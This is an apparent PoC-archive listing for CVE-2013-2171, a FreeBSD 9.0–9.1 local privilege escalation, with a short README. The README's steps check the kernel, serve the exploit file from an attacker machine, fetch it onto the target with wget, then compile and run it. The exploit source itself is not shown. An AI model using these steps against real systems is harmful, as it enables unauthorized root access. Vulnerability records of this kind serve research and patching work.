Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2013-2171 PoC — FreeBSD 本地提权漏洞

Source
https://github.com/0xGabe/FreeBSD-9.0-9.1-Privilege-Escalation
Associated Vulnerability
Title:FreeBSD 本地提权漏洞 (CVE-2013-2171)
Description:The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementation in the kernel in FreeBSD 9.0 through 9.1-RELEASE-p4 does not properly determine whether a task should have write access to a memory location, which allows local users to bypass filesystem write permissions and consequently gain privileges via a crafted application that leverages read permissions, and makes mmap and ptrace system calls.
Description
CVE-2013-2171
Readme
# FreeBSD-9.0-9.1 - Privilege-Escalation
CVE-2013-2171

By fbsd9lul@hunger.hu

## How to Exploit!

**1° Check the kernel version**

```
uname -a

FreeBSD freebsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012
```

**2° Transfer this file to target**

```
Attacker machine -> python3 -m http.server 8080

Target machine -> wget IP:8080/26368.c
```

**3° Use GCC to compile the code**

```gcc 26368.c -o exploit```

**4° Run the exploit**

```./exploit```
File Snapshot

 [4.0K]  /data/pocs/c4fd5d5b6573edf763dd43f8a00fec5a3d83a7de
├── [1.6K]  26368.c
├── [1.0K]  LICENSE
└── [ 476]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →